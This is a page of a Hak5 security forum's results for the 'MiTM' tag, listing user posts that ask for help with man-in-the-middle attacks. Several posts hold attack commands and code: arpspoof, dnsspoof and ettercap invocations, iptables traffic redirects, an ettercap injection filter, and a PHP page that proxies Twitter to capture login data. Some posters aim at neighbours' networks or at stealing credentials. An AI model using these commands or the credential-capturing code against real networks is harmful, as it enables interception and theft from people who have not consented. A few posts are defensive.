Jump to content

Search the Community

Showing results for tags 'MiTM'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hello, I've been attempting to redirect port 80 to port 8080 using iptables v1.8.3 to test an SSL strip MITM attack. I've entered the command: iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080 upon entering it gives me the _error_: unknown option "--dport" it also doesn't recognize the "--to-port" option. I'm running Kali Linux on a Rasberry Pi 4B 4GB Does anyone know how I can resolve this? I haven't found anything useful on the web after three days of troubleshooting. cheers! -MichaelPV
  2. I have a payload idea for the packetsquirrel. The idea is to use the bashbunny or the rubberducky to install a certificate in a victims computer. Then deploy the packet squirrel to be able to decrypt all https traffic. I'm just wondering two things, first, does anybody know any decent mitm program that the packet squirrel can actually run? I have looked at bettercap but it runs on ruby so I'm unsure if it will work with the packet squirrel. I have also looked a bit into mitmproxy but I found the documentation vague. If it can't be run the packet squirrel, maybe you could connect the bashbunny to it to perform the mitm attack.
  3. Hi, I have a WiFi Pineapple Nano which I recently purchased with the intention of testing the following: Scenario: smart devices and a smart phone within a home environment, with apps on the smartphone used to manage these devices. All connected to GuestWiFi WLAN. I have a HomeWiFi WLAN which I connected my laptop and other computing devices too. Both WLANs use the same power line home extender service (TPLink) I wish to: 1) Use the Nano to sniff traffic on the GuestWiFi WLAN 2) Perform a MiTM by either creating a PineappleWiFi SSID and force all devices to connect to it, or fake/spoof the GuestWiFi. I updated the Nano to the latest firmware 2.5.4, and have connected it to a Macbook Pro 2018 via the USB (through a USB-C-to-USB adapter). The Nano also had a 32GB SD card so I can install modules on it. It's been assigned by myself on the Internet sharing interface and it is accessible (via Management portal on a browser and via SSH), and access the Internet (including resolving different websites). Recon works well, and I have put the smartphone and all connected devices in the allow MACs part, and the GuestWiFi in the allow SSID part in the Filters section. My issue lies in being able to do 1) (I must be missing something here) and 2). Re (1), I enabled WiFi client mode to connect to GuestWiFi but the problem is that it says enabling PineAP conflicts with wlan1 -> Is this a case of having to use GuestWiFi just in client mode (and not enabling PineAP) to satisfy (1)? In the case of (2), I enabled PineAP, and have Pineapple WiFi. Connecting the smartphone to it results in no Internet access (do I need to do IP forwarding?). Any help would be appreciated. Thanks and Regards,
  4. What is the best way to protect me against MITM attacks under a public network?
  5. Hello , i bought new Wifi Pineapple NANO and i i've tried to install Ettercap module but i can not run it , and there is no log to check what is going on . is there any way to apply MITM attack on public network without forcing the clients to connect to my own evil AP , i want to spoof ARP and tcpdump all the traffic in nano sd. Thanks
  6. Hi, I don't post a lot on this forums but I made a cool script that protects a linux box from gateway ARP Poisoning attacks (it does it instantly, without a 5 second poll delay like other scripts). All details are on the github repo: https://github.com/Prodicode/ARPPD All feedback is appriciated! This was my first security project in C.
  7. Hey Guys, with April fools coming up soon I want to try to make an nCage payload for the LanTurtle. For the uninitiated, "nCage" is a Chrome extension that replaces every picture in the web browser with a picture of Nick Cage. I swear I saw somewhere that there was a payload for the LanTurtle that replaced pictures in the browser with pictures of cats, so I figured I could modify that payload, but I couldn't find it. Is anyone familiar with a payload similar to that?
  8. ok so ive setup the nano with wp6 to share connection with kali, this all works spot on, then i connect to the nano with my phone, this is also fine, i fire up wireshark but only see traffic directed from, is this correct, i persumed i would be seeing the given IP from my phone? should the internet connection be coming from the nano or the laptop? what interface should i be sniffing? this is slightly baffling my brain but i know its so simple, to much eggnog i think, I know in a moment this will just click in my brain as i feel im putting way to much thought into such a simple process thanks all
  9. Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.
  10. Hi everyone, I use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/ So here's my setup, MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine : Pardon my diagram skills :( Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal since you would need to ssh into the pineapple to run this script every time. Ideally it would be best to do this via the web interface of the pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated. #!/bin/bash if [[ $# -eq 0 ]] ; then echo "Usage: $0 (enable|disable)" exit 1 fi action="$1" case $action in enable) echo "Enabling ..." iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination iptables -t nat -A POSTROUTING -j MASQUERADE ;; disable) echo "Disabling ..." iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination ;; *) echo "Usage: $0 (enable|disable)" exit 1 ;; esac
  11. Hello, I hope my video will help you understand how hackers can man in the middle attack and one of their tools they can use. Look what they can do with Xerosploit.
  12. KST


    Hi I test the ssh mitm by the way this link. I have three PC ;attacker PC,ssh server and ssh client.After all instruction are made, I connect ssh to server from client .But when I do this , I cannot login with user from server. I can only login with attacker 's username and password and get logined to attacker pc.It means that attacker pc doesnot redirect to ssh server. But I have completed all instructions described in that link. If you have time, please check my question and answer me.
  13. After using MITMf for a while on my Kali Linux machine, I'm wondering whether it would be feasible to use it on a Bash Bunny. You'd have to be able to pull things like the gateway and DNS server automatically, but beyond that the only problem I can think of is the complex dependencies for MITMf. Thoughts?
  14. I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "<head>")) { replace("<head>", "<HEAD>"); msg("Code injected"); } } And I run it as ettercap -T -q -i wlan0 -F test.ef -M arp:remote / / test.ef is the compiled filter file. When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part, if (ip.proto == TCP && tcp.dst == 80) { replace("<head>", "<HEAD>"); msg("Code injected"); } "Code injected" message shows, but html code on the web client is not changed, which means, the problem is that the filter cannot find any named strings (in this case <head>) in the html file, it can only deal with the header (Accept-Encoding). Does anyone know a solution or work around, please, any suggestions will be appreciated, thanks
  15. Hello Hak5 members, New to this site and platform, but am pretty excited to be back in the states and to get my hands on the Tetra I purchased. When looking at modules I can't seem to find something similar to the MITMf framework integrated into it. This takes use of filepwn, but I have been having a great experience using Shellter. Where should I go for learning how to integrate a new module into the Pineapple? Here is what I am wanting: 1. Client makes request for .exe file 2. Pineapple forwards to the web server 3. Web server responds 4. Pineapple receives the traffic: If (PARAMS == TRUE): Pass the executable over to Shellter, inject a payload, then forward to the client. else: forward to the client Some of the params you would setup would be maximum file size (to make sure the process doesn't take too long), if the program is already wrapped, etc. Ideally, one would be running some sort HTTPS downgrade attack, or SSL Stripper, so the probability of injection is higher as most sites now use https. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow user's to pipe the executable to whatever program they want to handle the payload injection and just have the module looking for the created file to popup in a specific location.
  16. Hey all, The Tetra allows us to do so many great things. We can spoof the SSID and make a Client think they are connecting to a "known" AP. The Client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the Client sends? I have a feeling the issue has to do with hashing done at each sides of the 4-way handshake. It just seems like we should be able to MitM some of this. Appreciate anyones input and teaching my like i'm 5 If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn to clear text", then why are we unable to "pass the hash" with Wifi.
  17. Hi guys! I recently wanted to get interrested in deploying a MITM attack in my home network. I firstly used SSLSplit and ettercap from the Pineapple Web Interface (which is a little bit buggy sometimes). From there, the attack worked 1/3 of the time. Then I tried to do this from the CLI. ettercap seems to work pretty well (ettercap -Tqi wlan1 -M arp:remote // //) but I didn't managed to get SSLStrip working... And if I try to run SSLStrip from the GUI, the certs are signed by "SSLStrip", which cause security warnings. Is there a way to generate customs certs and pass them to the SSLStrip GUI? Thanks! PS: I observed that when the attack is going on, it's really slow to browse the internet... Is it normal? Sorry for my bad english
  18. Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker
  19. Hello, I was wondering what are the different techniques you guys use for a man in the middle attack. Just for something to learn and advance on. Thanks.
  20. Is there any possible ways of doing MITM attacks that would take usernames and passwords. When I try to use Xerosploit, PytheM, or even bettercap. None of these methods work on websites such as Facebook, Twitter, Paypal, Gmail, etc. Is there any new methods that is the latest that is working right now?
  21. Hi, I did a pentest in a LAN, some weird things happened. This LAN is a little unusual, there are two routers, say A and B, A is directly connected to an optical fiber, doing PPPoE, to the WAN, it has a gateway of, B is connected to A, wireless router, with a gateway of All the clients and my Kali machine are connected to B. Target has an IP of Here is what I did with Kali, I use the following to arp spoof the target and router B arpsoof -i eth0 -t arpsoof -i eth0 -t sysctl -w net.ipv4.ip_forward=1 Then I did a Dns Spoof with dnsspoof -i eth0 -f dnshost.spoof It did not work, all the traffic went through my Kali, but the target was still able to access the original webpage. And here comes the weird thing. I stopped the dnsspoof, stopped the ip forwarding sysctl -w net.ipv4.ip_forward=0 and I started the exactly the same exact dnsspoof as last time again, it worked! This really confused me, because after that, I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all, I left it to be the default 0, and it did not work, because the arp traffic was not working (which is excepted!!). ArpSpoof and dnsspoof both work ONLY IF the process "ip forwarding is firstly enabled and then disabled" completed once, before launching dnsspoof. Ip forwarding only on gives dnsspoof not working, ip forwarding only always off gives arpspoof not working. Besides that, two more strange things I failed to understand. 1, Sometimes, the "ip forward on and off" cycle must be done in the same terminal where the dnsspoof takes place, in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure. 2, Here is the log/feedback of a DnsSpoof root@kali:~# dnsspoof -i eth0 -f dnshost.spoof dnsspoof: listening on eth0 [udp dst port 53 and not src] > 4678+ A? www.youtube.com > 4678+ A? www.youtube.com > 31827+ A? www.youtube.com > 31827+ A? www.youtube.com > 51608+ A? www.sina.com > 51608+ A? www.sina.com > 5651+ A? www.sina.com > 5651+ A? www.sina.com > 2950+ A? www.sina.com > 41196+ A? www.facebook.com > 41196+ A? www.facebook.com > 6912+ A? www.facebook.com > 6912+ A? www.facebook.com ^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof dnsspoof: listening on eth0 [udp dst port 53 and not src] > 60485+ A? www.youtube.com > 60485+ A? www.youtube.com > 28894+ A? www.sina.com > 28894+ A? www.sina.com The second launch was a failed one, the first one succeeded. The router I am targeting should be, as the router B, in the second launch, it is interacting with only router A (, I am not sure what does that mean and if it has something to do with the failure directly, because in the next few attempts, a feedback situation like this second launch worked sometimes. I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks
  22. Hey guys, I'm partially new here, just wanted a little bit of help with MiTM attack. Suppose, I successfully cracked my Neighbours WiFi using Evil Twin method and now I want to Man In Middle his smart phone or his whole network, is it possible? My question here is that most of us nowadays use smart phones to use Facebook, E-mails etc and not just go to browser and then facebook.com right? So is that possible? Thanks! :confused:
  23. I am completely and utterly disappointed. i have been searching for weeks to find out how to preform a arp-poising MITM attack to sniff plain text credentials, the best thing i could find was Responder. There is no guide on how to use this explicitly on the WiFi Pineapple. I have basically paid $250 for a box. The last person to ask about this did not get anywhere in terms of help either. Please Can somebody in this entire forum show me how i can configure Responder to work on a Wireless network. Like from the ground level. What options do i select, do i connect in client mode (Wlan1, Wlan0) ect. Please, this was a big investment for me.
  24. Hello Wonderful People, So I'm hitting a snag with an attack I'm trying to carry out and could really use anyone's help trying to troubleshoot this. I've got the theory down and get half way but can't seem to jump the last hurdle. So here's the jist, I'm trying to MitM devices connecting to my TETRA using Burp Suite to capture any HTTP or HTTPS traffic so that I can observe/modify (you know the drill) the HTTP/S traffic. Thing is, I can capture the traffic and MitM successfully with the TETRA (I am able to see all traffic passing through my attack machine within Wireshark). However, I can't seem to get that traffic into Burp. I'm only interested in sending HTTP/S traffic to Burp, all other traffic can head on out to the Internet. I've tried using iptables rules to preroute the traffic bound for dport 80 or 443 to the Burp Proxy listening on 8080 (and tried individual listeners on 80 and 443 to no avail), but no traffic seems to get to it... well to an extent. If I grab the HTTP header of google.com whilst routing traffic to Burp, I can grab a HTTP header for Burp itself. Here's a diagram because I like making them: Attackers IP (Eth1) is Eth0 IP is (LAN has Internet connectivity via gateway at ETH0 and 1 are wired (I wire into the ETH port of my TETRA). Mobile devices are connecting via WiFi (PineAP). It's simple enough in my head, have all traffic coming in over ETH1 that is destined for 80 ro 443 re-route to the Burp Listener... but it doesn't seem to work correctly. Here's the iptables rules I was creating to try and route the traffic (applied on the attackers machine): iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to And ip forwarding is enabled on the attackers machine with: sysctl net.ipv4.ip_forward=1 I'm still trying out stuff, next thing is to route HTTP/S traffic from ETH1 to LO (seeing as the listener is on LO, but I know from previous posts their are legends on these forums and would appreciate some pokes in the right direction if anyone has any ideas. And yes, I did look around the forums and on the Internet, but I can't seem to find the thing that works. Any thoughts are welcome. Think this might be a cool addition to the forums if we can get it going. Thanks.
  25. Hey everyone, I am wondering if you guys have any specific steps you take once you are the MITM? What kind of things are you trying to do with the packets? Push java applets to clients? Use Karmetaspolit? Since SSLStrip is no longer working, what types of things are you doing to gaurentee the most data out of your "victims". I am particularly intrested in emails, social media, etc... Assuming its been approved by the client I am auditing. I really want to show some examples of what can go wrong for a client site when a MITM attack is successfully executed using the pineapple, any ideas?
  • Create New...